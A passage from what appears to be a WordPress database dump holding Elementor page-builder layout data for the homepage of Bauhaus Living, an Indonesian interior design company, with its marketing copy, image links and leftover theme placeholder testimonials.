leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4208,4918,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4209,4918,'_elementor_pro_version','3.8.1'),(4210,4919,'_wp_page_template','elementor_header_footer'),(4211,4919,'_elementor_edit_mode','builder'),(4212,4919,'_elementor_template_type','wp-page'),(4213,4919,'_elementor_version','3.8.1'),(4214,4919,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"back